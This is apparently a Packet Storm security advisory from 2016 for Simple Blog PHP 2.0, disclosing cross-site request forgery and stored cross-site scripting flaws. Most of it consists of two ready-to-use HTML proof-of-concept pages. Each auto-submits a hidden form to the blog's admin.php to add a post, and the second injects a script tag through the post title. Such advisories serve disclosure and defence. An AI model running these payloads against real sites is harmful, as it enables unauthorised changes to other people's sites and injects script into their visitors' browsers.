Simple Blog PHP version 2.0 suffers from cross site request forgery and cross site scripting vulnerabilities.
dbf0d102e9f3e34c16c2fd12e85ad25a57d67bd13cb65d598b28cd2cc1650b4f=====================================================
# Simple Blog PHP 2.0 - CSRF(Add Post) // Stored XSS
=====================================================
# Vendor Homepage: http://simpleblogphp.com/
# Date: 13 Oct 2016
# Demo Link : http://simpleblogphp.com/blog/admin.php
# Version : 2.0
# Platform : PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
=====================================================
# CSRF PoC(Add Post):
<html>
<!-- CSRF PoC -->
<body>
<form action="http://localhost/blog/admin.php" method="POST">
<input type="hidden" name="act" value="addPost" />
<input type="hidden" name="publish_date" value="2016-10-13 10:30:27" />
<input type="hidden" name="post_title" value="Hacked" />
<input type="hidden" name="post_text" value="Hacked" />
<input type="hidden" name="post_limit" value="550" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Stored XSS PoC:
<html>
<!-- CSRF + XSS Stored PoC -->
<body>
<form action="http://localhost/blog/admin.php" method="POST">
<input type="hidden" name="act" value="addPost" />
<input type="hidden" name="publish_date" value="2016-10-13 10:30:27" />
<input type="hidden" name="post_title" value="<script>alert('Xss
PoC')</script>" />
<input type="hidden" name="post_text" value="Hacked" />
<input type="hidden" name="post_limit" value="550" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
================================================================================
# Discovered By : Ehsan Hosseini
================================================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed